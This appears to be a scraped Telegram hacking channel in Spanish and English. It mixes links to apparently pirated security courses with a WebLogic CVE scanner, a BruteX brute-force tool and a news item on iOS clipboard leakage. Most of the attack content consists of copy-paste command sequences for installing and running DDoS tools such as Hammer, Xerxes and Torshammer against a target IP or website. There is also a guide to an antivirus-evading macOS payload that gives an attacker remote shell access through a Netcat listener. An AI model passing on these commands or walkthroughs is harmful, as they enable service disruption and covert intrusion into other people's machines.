Comunidad Pen7esting
3.58K subscribers
510 photos
40 videos
142 files
5.08K links
Download Telegram
weblogicScanner 漏洞扫描工具

CVE-2014-4210
CVE-2016-0638
CVE-2016-3510
CVE-2017-3248
CVE-2017-3506
CVE-2017-10271
CVE-2018-2628
CVE-2018-2893
CVE-2018-2894
CVE-2018-3191
CVE-2018-3245
CVE-2018-3252
CVE-2019-2618
CVE-2019-2725
CVE-2019-2729
CVE-2019-2890https://t.co/phKZBaMFih pic.twitter.com/ChD5exV1wi— Jin Wook Kim February 18, 2020
🎩 eLearnSecurity – Mobile Application Security and Penetration Testing (MASPT v2) 🎩


Syllabus
Section: Android

Module 1 : Android: Android Architectures
Module 2 : Android: Setting up a Testing Environment
Module 3 : Android: Android Build Process
Module 4 : Android: Reversing APKs
Module 5 : Android: Device Rooting
Module 6 : Android: Android Application Fundamentals
Module 7 : Android: Network Traffic
Module 8 : Android: Device and Data Security
Module 9 : Android: Tapjacking
Module 10 : Android: Static Code Analysis
Module 11 : Android: Dynamic Code Analysis

Section: iOS

Module 1 : iOS: iOS Architecture
Module 2 : iOS: Device Jailbreaking
Module 3 : iOS: Setting up a Testing Environment
Module 4 : iOS: iOS Build Process
Module 5 : iOS: Reversing iOS Apps
Module 6 : iOS: iOS Application Fundamentals
Module 7 : iOS: iOS Testing Fundamentals
Module 8 : iOS: Network Traffic
Module 9 : iOS: Device Administration
Module 10 : iOS: Dynamic Analysis

Download:

https://drive.google.com/drive/folders/1R9D5f38p6C9yUuO52YWrQxUdxEbktaT4





eLearnSecurity Hacking Courses
elearnsecurity courses:
1- Web Application Penetration Testing eXtreme (eWPTX )
6th2- Penetration Testing Professional (ePTPv3)
3- Web Application Penetration Testing (eWAPT v2)
https://mega.nz/#F!fqognSKY!cMa-JNPgLgTikrpI-JqMdQ


Cyber training 365
(many certificates include CHFI, CSAT, CSMD, CEH, CWAD, and more...)
https://mega.nz/?fbclid=IwAR3nWcT-uky4-zKGJ2jNRt_McQ7QXo-cBOF0GFlZJxuQLJjT6J4iH3obIvs#F!HGg2TCTA!CjyPNP3bktKV9w4_g2xUDg!aegwkYKS


50gb of hacking courses :
https://mega.nz/#F!7jIyBShb!5uQgMY-3UjZNCMrISP6ufQ


Pentester Academy 1
https://mega.nz/#F!BfBRECpZ!rwUAqCMPahV6e9oSs8twwQ
Pentester Academy 2
https://mega.nz/#F!7OIE2C5D!QMfFjVo6ipO1K7X_FhdOHg


Reverse engineering and Exploitation development
https://drive.google.com/file/d/0B5a4h0JxHNetNGtTRzBXT1Q4SlU/view


Offensive Security - Advanced Web Attacks and Exploitation [AWAE]
https://mega.nz/#F!pVYhhYbb!-zJK__ZypSgnnxoLFy2ICw


#Udemy - Practical #Ethical #Hacking - The Complete Course :-
#Download :- https://mega.nz/?fbclid=IwAR1f1T6jOdfQ01APTxTieVq2fCnckyH-FE6VTbOBEwzk9Op1fRHpAXrEt7M#F!n3RWzKYY!1xvBdLgoVxsNayNoxl7qQA


#Packt - #CompTIA #Security+ (SYO-501) course ...
#Download link :-
https://mega.nz/#F!DnZWBCYb!vAjXcKf90Pn3w5y4iPrdxg


#CompTIA #A+ full course:-
https://youtu.be/2eLe7uz-7CM


#CompTIA #Network+ full course:-
https://youtu.be/vrh0epPAC5wE6VTbOBEwzk9Op1fRHpAXrEt7M#F
《DDOS ATTACK》
●Lucita DDOS
$ apt update && apt upgrade
$ apt install python
$ apt install git
$ git clone https://github.com/zlucifer/lucita_ddos
$ cd lucita_ddos
$ chmod +x pukul.py
$ python pukul.py

●Ddos Attack (Trojan)
$ apt install git
$ apt install python
$ apt install bash
$ apt install toilet
$ apt install lolcat
$ git clone https://github.com/BPCATTACKER/DOS-TOOKITS
$ cd DOS-TOOKITS
$ chmod +x DOS-TOOKITS.sh
$ sh DoS-TOOKIT.sh

●Hammer
$ pkg update
$ pkg upgrade
$ pkg install python
$ pkg install git
$ git clone https://github.com/cyweb/hammer
$ cd hammer
$ chmod +x hammer.py
$ python hammer.py
$ python3 hammer.py -s [IP target] -p [80] -t [135]

●Xerxes
$ apt install git
$ apt install clang
$ git clone https://github.com/zanyarjamal/xerxes
$ ls
$ cd xerxes
$ ls
$ clang xerxes.c -o xerxes
$ ls
$ ./xerxes (nama website) 80

●Torshammer
$ pkg update
$ pkg install git
$ apt install tor
$ pkg install python2
$ git clone https://github.com/dotfighter/torshammer.git
$ ls
$ cd torshammer
$ chmod +x torshammer.oy
$ python2 torshammer.py

●LiteDDOS
$ apt update
$ apt upgrade
$ pkg install git
$ pkg install python2
$ git clone https://github.com/4L13199/LITEDDOS
$ cd LITEDDOS
$ chmod +x liteDDOS.py
$ python2 liteDDOS.py
TESTED UNDETECTABLE MACOS PAYLOAD:
Armor is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners.




1) Armor relies on LibreSSL to encrypt the input file and create the SSL certificate. If LibreSSL isn't found in your system, Armor will attempt to install it. The function for this can be found in the armor.sh file. Ncat is also a dependency and can be installed in Kali using $ apt-get update && apt-get install nmap.

2) git clone https://github.com/tokyoneon/Armor

3) cd Armor/

4) chmod +x armor.sh

5) ./armor.sh /path/to/payload.txt 1.2.3.4 443

6) The 1.2.3.4 address is the attacker's IP address where the decryption key will be hosted. This can be a local IP address or VPS. The port number (443), is arbitrary and can be changed as needed.

A Netcat listener is started on port 4444. The "payload.txt" file is read and shown to contain a simple Bash one-liner that, when executed, will create a TCP connection between the target MacBook at the attacker's Netcat listener. Armor is used to encrypt the bash one-liner. Ncat is used to host the decryption key on the attacker's server. When the stager is executed in the target MacBook (not shown in the gif), the bash one-liner is decrypted and executed without writing any data to the harddrive. Ncat immediately terminates the listener after the key has been used. When the Netcat connection is established, the attacker has remote access to the target MacBook.

>Admittedly, encrypting most macOS-specific payloads is overkill. This specific bash one-liner is capable of bypassing antivirus without the help of Armor. But this is just an exmaple. The same degree of obfuscation can be applied to sophisticated Python, Ruby, and Shell scripts designed to execute a variety of advanced attacks.
Web-Pentesting 2019 script:
>ITWSV is automated penetration testing tool which performs information gathering, auditing and reporting.


𝕀𝕟𝕤𝕥𝕒𝕝𝕝𝕚𝕤𝕒𝕥𝕚𝕠𝕟 & ℝ𝕦𝕟:

1) git clone https://github.com/penetrate2hack/ITWSV.git

2) cd ITWSV

3) chmod +x start.sh

4) chmod +x update.sh (only if required)

5) ./start.sh
MalwareBytes ha publicado un titular muy jugoso: por primera vez las amenazas en Mac superaron a las de PC en una proporción de nada menos que el doble en 2019. Muchas webs han multiplicado este gran titular.
BRUTEX

BRUTEX is a shell based open source tool to make your work faster. It combines the power of Nmap, Hydra and DNSenum. This tool will automatically run an nmap scan to your target and then it will brute force all the open services for you, such as FTP, SSH and more using Hydra.

Installing Brutex

Same old story, clone the repository first.

git clone https://github.com/1N3/BruteX.git

Run the install script, to download all the missing dependencies.

cd BruteX/ ./install.sh
Todos con enlaces directos:

1: Administración de sistemas operativos
https://mega.nz/#F!26Y3hA4D!86JS5eszvWE6F34DX4lQxw

2: Administración de sistemas operativos

https://mega.nz/#F!uyYT0KJK!2mvfFsKqH7IDKmlpFYtqAA

3: Ampliación de computadores

https://mega.nz/#F!jvRxEarK!cZi26Xhrca3FdQB2kna0tA

4: Análisis Forense

https://mega.nz/#F!HjRXgAjL!ADw4t9QsMeErdmHNdM_CJw

5: AnalisisForense

https://mega.nz/#F!H3QlXagI!gJW6iPlFHvjNC2nanj9mPA

6: Anatomía ataque informático

https://mega.nz/#F!K6Bh1aqY!dOca1Xe9zRoCoLp4FjRv4Q

7: Android

https://mega.nz/#F!SnJxFA7K!gKhDBseT5EuT5-xZsvUYjA

8: Anon99

https://mega.nz/#F!urBTTIpR!URlCCGnOzHvmfikTZWyVog

9: Arduino

https://mega.nz/#F!PzBjiAQS!2R9zkN_iQtRx8azCkaNlKQ

10: Arquitectura informática

https://mega.nz/#F!CzR2HArB!R1VoTMM5OWMfxS3ozjUfHg

11: ASP

https://mega.nz/#F!fqQyxQhT!02ZZ2PVTAGwxQQu2o8f4xQ

12 : Redes

https://mega.nz/#F!u6REGazT!17bPkKJqb3L3MhCpXY2aig

13: Software Libre

https://mega.nz/#F!yvYEDYBK!lXVVEDE0_-tiCn5I2JKshA

14: Auditorias wed

https://mega.nz/#F!6iQWBaCQ!zOKv5-iNp69FBcvDQHkGcw

15: Auditorías Wed By aletinte

https://mega.nz/#F!u2AEVaZR!A2wNpnFq9uq9Grc6DIGXDQ

16: Blackdoor

https://mega.nz/#F!CuQg0ILY!yeOtzs0HTv2tVOAwkIs46g

17: BlackTack

https://mega.nz/#F!CnYA0ILQ!ujOMrkCW1x0ntQwnbU3JKw

18: BlackTack5

https://mega.nz/#F!O6Z0Ta6I!nCJHEOvQVOshAg2vf09AKg

19: BlackTack 5 By Aletinte

https://mega.nz/#F!izBWEa5S!7jVUoqUA2XzSUZao6wrjjg

20: Base de Datos

https://mega.nz/#F!TnZWxaya!1InqYf71LoRgoWTNZ6XG0A

21: Base de datos By Aletinte

https://mega.nz/#F!W6YimQhT!M67uLY2hNJ79TFfvBI-bZw

22: BaseDeDatos

https://mega.nz/#F!CmAUgKjR!b1kGktBxNJ5HJ_2JaGVGSw

23: Binarios

https://mega.nz/#F!HvAGRKpb!jVP7ZaViuMz-2d9uKNjbiA

24: Programacion C

https://mega.nz/#F!TzJ0DKib!VGxqzlF4Ew1EB_hUWjW8rA

25: CGI

https://mega.nz/#F!37QQCaDR!RHPjNDyLAFCcA8M-qd7V3A

26: Cifrado-Vpn

https://mega.nz/#F!3yQSVQRZ!FOYsjn_B_61AiPIK_KENfw

28: Circuitos

https://mega.nz/#F!OzJ2wQpa!UUwR5BLY7YPCDqy26sJafA

29: CMD

https://mega.nz/#F!6mIGGYaJ!guYD9u6JS6r7znWSm-AA0g

30: COBOL

https://mega.nz/#F!D2ISGADI!BgCKKqKlSPJPGRSdOQe_3Q

31: Comandos

https://mega.nz/#F!ajJAyKab!zYsaSWbCesMnKbiMq415eQ

32: Bluetooth

https://mega.nz/#F!arJCWI7A!WXWrDwPg9dgPb_JxVEAm0Q

33: Cracking

https://mega.nz/#F!WiAARCjD!lQ-TfZ_gmqZOgQiB6KTErg

34: Cracking by Aletinte

https://mega.nz/#F!XvJCCaZZ!QKPnq6IVyoTCQlsLMkG96w

35: Criptografía

https://mega.nz/#F!TzBAXKYL!aYqu54lnq3nC9BLr_v-vFg

36: Criptograf

https://mega.nz/#F!SjRi0ALB!Pb3IMC-A8_4JFYSJgeX7MA

37: Cursos

https://mega.nz/#F!P2wVBSpK!ein9iW50EeYzS-VprX8ugA

38: Deep Wed

https://mega.nz/#F!mrohiChS!Xj2ddirab5KI97DdHJoKWw

39: Deface

https://mega.nz/#F!D64TkQBB!T9Dz2fXtT_NLyCZjvrz9Yg

40: Deidel-Deidel

https://mega.nz/#F!T6gzzKBB!oZrJJv4hofsCAMzjoroNMg

41: DELPHI

https://mega.nz/#F!Hj5RSKqK!LvSCDl53lOMMVWRcIi_kEA

42: Desarrollo de software

https://mega.nz/#F!qr5XEARS!U8_kb_BGQh6CDGVK_JkG4g

43: Desarrollo de software By Aletinte

https://mega.nz/#F!iupHwYbC!On4nK0CRsNUxcdR429gBVA

44: Detecsion-coliciones

https://mega.nz/#F!LzwHVQ4S!t8us76oqb6JrC5ccp33mRg

45: Deteccion-honeynets

https://mega.nz/#F!fvwnyAyS!QX9CjhA7SPg4FNnD8mxPnQ

46: Dinero electrónico

https://mega.nz/#F!j2pzkaAD!I7fIzUujuDkq37h1Z9tgQQ

47: Diseño-Desarrollo honeypost

https://mega.nz/#F!angBEAwJ!7nxfB97uRSLJKj4P7CPD-Q

48: Electrónica

https://mega.nz/#F!zu5zlSxC!apjvUelJmt31YT-ReUhf7A

49: Ensamblador

https://mega.nz/#F!Om432CYJ!shvMiqhwxlXdH9kKyl6ohQ

50: Estudió

https://mega.nz/#F!P6gXxQhb!ipRwbOn5w03VllvqQtQXpA

51: Extras

https://mega.nz/#F!fmwzWYqJ!vgdXvph26vEYSbhqY73Xjw

52: Firewall

https://mega.nz/#F!6ugziSxR!QgtGwfZcbEwGnru0iYpOVA

53: Forense

https://mega.nz/#F!26oDASgK!NnKTJbaGEFcJ_B5AgcVWpA

54: Forense By Aletinte

https://mega.nz/#F!m7hF0YTZ!05HyuFw_7cDd9BzloamoHg

55: Fortran

https://mega.nz/#F!62gBnIoD!n5raX4xfGf_VmfSC9M_EZA

56: FORTRAN

https://mega.nz/#F!PixXxKjQ!B6TQ6lZchXwWSsgU_BHKUA

57: General

https://mega.nz/#F!yqo1wagQ!Ebr93EwmTLQxUsvl_xCm8g

57: General

https://mega.nz/#F!yqo1wagQ!Ebr93EwmTLQxUsvl_xCm8g
58: General By Aletinte

https://mega.nz/#F!3rwz3QqS!wJf5WrTK_i3OJ0ifx-3lsw

59: Gestión de riesgos

https://mega.nz/#F!ej5VnCaI!JxJVpBmoxZ-QqVo24PFnGA

60: Gestión-riesgo

https://mega.nz/#F!3i4zmCiD!MK6WArvSR76x3lPiTbfojw

61: Grafos

https://mega.nz/#F!yi5x2AIL!txHOmfsFzcGRDAoVDULddg

62: Hackerst sociedad

https://mega.nz/#F!brpBTYYC!uL9lezvaTR_3nE5KZrZfuA

63: Hacking

https://mega.nz/#F!zq5XFAKS!3d9c8b-ht7_6v4-1OU6gNw

64: Hacking By Aletinte

https://mega.nz/#F!rmxhCADD!b2Xs5I4zs231FIxzxiNZig

65: Hacking ético

https://mega.nz/#F!i3gVASQS!hd87GuRwYgl5cZvz83IVaQ

66: Hadware

https://mega.nz/#F!K2pVBSSQ!dGUfmWPt87TsGCCWIzoVMw

67: Hadware By Aletinte

https://mega.nz/#F!CqpH2CbA!swjwHM7HubDuEKqwnUUK3A
68: Hascat

https://mega.nz/#F!fr5xVKAY!xUwSb-_uXkIND9gK6hFB1g

69: HTML5 y CSS3

https://mega.nz/#F!v64FRSLA!_IrgpHNyVFSl6RLcPQnKFA

70: Informática

https://mega.nz/#F!Xyh1nApZ!kagFaTkNQ2Jvu8a4wyKMPg

71: Ingeniería

https://mega.nz/#F!OjpjHC4S!Pg_p3vr_vpwXSnaH2s1TEA

72: Ingeniería Social

https://mega.nz/#F!i34DzAiT!JjPsRql7wtYq9dKoL5573Q

73: Internet Hack

https://mega.nz/#F!nqhz2Q6D!0ZZi9F6iaK3KJwGX6MNnAg

74: Introducción a Páginas Wed

https://mega.nz/#F!O7hxCIiR!Eo348B7LfRzCOmy20JLGvg

75: Introducción a software libre

https://mega.nz/#F!e3h3FYzA!-KRTgAIITz_Y0xFganPl3A
76: IP

https://mega.nz/#F!Gi5BVIiD!F7PWE7yqG1RP-EtLdECzIg

77: Java

https://mega.nz/#F!uy5FwYoJ!zCj3HvlU_Abv0OyIjKCX_w

78: Laboratorio de PHP y MySQL

https://mega.nz/#F!K25nXKTT!_rPGtkxvbI9SyZkcZzkkVA

79: Lenguaje ensamblador

https://mega.nz/#F!T3h3maJQ!NlmNhwgJnbD6-pAQWxk81g

80: Libro Hacker

https://mega.nz/#F!L6gx0KAA!yKALCCzHcAZzp8iuKjF65Q

81: Libros

https://mega.nz/#F!WqpllCJL!5TlhEyXjdrfG8MS0Ngth8A

82: Libros ASP

https://mega.nz/#F!i2ozlCwa!9UTKqp8QUNFjocGkvHpJaQ

83: Libros C

https://mega.nz/#F!2qgTWaYa!w9foGvc68hEnaUI56uwBYQ

84: Libros C#

https://mega.nz/#F!GyxXQQZI!p2lX6q4SK1SRILF3ANMc0Q

85: Libros C++

https://mega.nz/#F!37glRS4L!bDSMwh

112: OS GNU Linux Basico

https://mega.nz/#F!WuR1maBD!A6efu4yo1H_WP7olPBbSCw

113: Pascal

https://mega.nz/#F!iiR3hCLC!sQtubZH3JFyonR26mgcH8A

114: Perl

https://mega.nz/#F!DuZ1wAoa!N-FUQwtnr_aZMxZGFWGkEg

115: PFC

https://mega.nz/#F!yrQR0SQT!5dZwNMIw3HRIyPa6beFOHw

116: PHP

https://mega.nz/#F!7ng3USqa!HE11FOquAgimlNZefsYdUw

117: Plan recuperación de desastres

https://mega.nz/#F!D2IizIDb!ehrPGzSEoGc_f088YBg7AQ

118: Plan seguridad informática

https://mega.nz/#F!rqQFQKwJ!BHP91yYUuj3HjRsRj7jjkw

119: Programacion en Prolog

https://mega.nz/#F!PnJVSaga!04p4XIhrR42tT3ZexW1FfQ

120: Programacion

https://mega.nz/#F!v6onwDxY!3g5c_VspUT-PuBNzEHSLJw

121: Programacion en general

https://mega.nz/#F!yvYwXC5b!Huwi1PCJgz9CvVX_aDtlsw

122: PROGRAMACION

https://mega.nz/#F!HyglxITC!WX9_kofvaffIidLNSydisA

123: Python

https://mega.nz/#F!vjQknaTb!dLLdNgEFtq3d8L6E2fMJSw

124: Redes

https://mega.nz/#F!DyJjEY7S!1P6XKmKXG4SkqjPoL3ZWjA

125: Sector público

https://mega.nz/#F!D2pHmIbL!MzQ0bwlq98ZyLm0G8EO9tQ

126: Seguridad en redes IP

https://mega.nz/#F!CvxTUJjS!ZU_JhJGVM-7mabCreosXfg

127: Seguridad informática

https://mega.nz/#F!O7ZWHaiR!yvB06PVUiIIY9bA1gVlpLQ

128: Seguridad informática 1

https://mega.nz/#F!i3BC3K7Z!DIF0-ha8Xj6ANWU4u_t6TQ

129: Seguridad informática 2

https://mega.nz/#F!b7owHC5I!fJDgYrdbWLGhT1I3GDMAvg

130: Seguridad medios digitales

https://mega.nz/#F!qihi2CjY!dkiF8SQYp7RUtZIN5-Kg9Q

131: Seguridad redes IP

https://mega.nz/#F!eywR0YCY!iZW9-jDuzsb1t0p9xR2urQ

132: Seguridad sistema informático

https://mega.nz/#F!m3oH2IwL!lnStVUH5brU-Om8nxZKg4A

133: Servidores

https://mega.nz/#F!Hjh0DaoL!hpgJcg5QAb5Psl3tDtBKBg

134: Sistema-Seguridad informática

https://mega.nz/#F!T2pWgQjR!bHYRYiLSqHjzTVghauqBdQ

135: SQL

https://mega.nz/#F!i3hGQQ7a!0KcvF0gvAZ9X572RPisZzA

136: Transacciones onnile

https://mega.nz/#F!CugTxJLT!fG95hb3MzSyH1NHngm0_uA

137: UML

https://mega.nz/#F!P35Rxb5L!M9Gm38wXt5wqL-w3evgNpQ

138: Visual Basic

https://mega.nz/#F!erpXnJga!tfETzadMhlLbvt4vyMIh-Q

139: Wifi

https://mega.nz/#F!WnxzDTTQ!ZDC429C-rXD0L9tCLRW3GA

Enviado por #Mateo
Noticias de seguridad informática
¿Usuario de iPhone? No copie y pegue su número de tarjeta o contraseñas. Otras apps pueden robar sus datos del portapapeles

Apple suele jactarse del nivel de protección de datos y seguridad de sus dispositivos. Si bien la comunidad de la ciberseguridad reconoce los esfuerzos de la firma y su superioridad en cifrado y privacidad respecto a sus contrapartes, la firma no está exenta de fallas de seguridad. Un equipo de investigadores ha reportado el hallazgo de una vulnerabilidad que permite la intercepción de datos personales almacenados en diversos modelos de iPhone o iPad.

Cuando un usuario copia cualquier información, ésta se almacena en el tablero general de Apple (comúnmente conocido como portapapeles). Según el reporte, cualquier aplicación puede acceder a esta información almacenada temporalmente en el portapapeles, por lo que los usuarios se exponen a la filtración de datos confidenciales como ubicación, contraseñas de acceso a perfiles en línea y datos bancarios.

Al parecer, todas las apps del
sistema operativo iOS cuentan con acceso ilimitado al tablero general de todo
el sistema. Un usuario podría exponer, de forma no intencionada, su información
confidencial (como datos de ubicación) a otras apps con sólo copiar una foto
tomada con la cámara del dispositivo, gracias a los metadatos de la imagen,
mencionan los especialistas en protección de datos.

Para demostrar su hallazgo, los investigadores desarrollaron una app de prueba de concepto llamada KlipboardSpy y un widget de iOS llamado KlipSpyWidget. Esta app de prueba no cuenta con acceso a los datos de ubicación del dispositivo; aun así, los especialistas lograron extraer esta información mediante el método descrito anteriormente.

https://noticiasseguridad.com/wp-content/uploads/2020/02/klipboard01.jpg <figcaptionLa app se instala como cualquier otra herramienta de iOS

https://noticiasseguridad.com/wp-content/uploads/2020/02/klipboard02.jpg <figcaptionAl pegar la foto en la app, la herramienta devolverá los datos de ubicación de la foto

Los especialistas afirman que el
reporte fue enviado a Apple desde enero pasado. Sin embargo, el equipo de protección
de datos de la compañía respondió que este error no podía ser considerado como
una vulnerabilidad, pues sus sistemas operativos están diseñados para permitir
que las aplicaciones accedan al portapapeles solamente cuando las apps están en
primer plano.

Al respecto, el Instituto
Internacional de Seguridad Cibernética (IICS) considera que Apple no
debe permitir que las apps accedan al portapapeles sin restricción alguna, como
el consentimiento expreso del usuario. El sistema operativo sólo debería
exponer el contenido del portapapeles a una aplicación mediante previa
confirmación, pues en ocasiones los usuarios no están al tanto del contenido de
esta herramienta.

El cargo ¿Usuario de iPhone? No copie y pegue su número de tarjeta o contraseñas. Otras apps pueden robar sus datos del portapapeles apareció primero en Noticias de seguridad informática | Ciberseguridad | Hacking.